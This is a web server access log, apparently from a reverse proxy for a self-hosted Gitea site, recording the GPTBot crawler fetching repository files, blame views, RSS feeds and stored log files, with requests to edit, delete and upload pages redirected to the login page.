"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:16:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:16:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json?display=rendered" [Client 74.7.227.38] [Length 11175] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:16:43:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:16:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:16:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:16:43:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 9829] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:43:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 129] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 10586] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:43:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:16:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:16:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 413] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:16:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:16:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 9828] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:16:43:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 953] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:16:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 129] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:16:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 10597] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:16:43:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" +[17/Feb/2026:16:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService/obj" +[17/Feb/2026:16:43:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:43:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:43:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:43:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" +[17/Feb/2026:16:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static/js" +[17/Feb/2026:16:43:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:43:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" +[17/Feb/2026:16:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/js" +[17/Feb/2026:16:43:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json?display=source" [Client 74.7.227.38] [Length 11512] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:16:43:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" +[17/Feb/2026:16:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj" +[17/Feb/2026:16:43:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:16:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:16:43:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15366] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:16:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:16:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 310973] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 923896] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 30717] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 163197] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 2931] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 2929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 15008] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 25334] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 410168] [Gzip 15.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 2437] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14676] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:16:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr 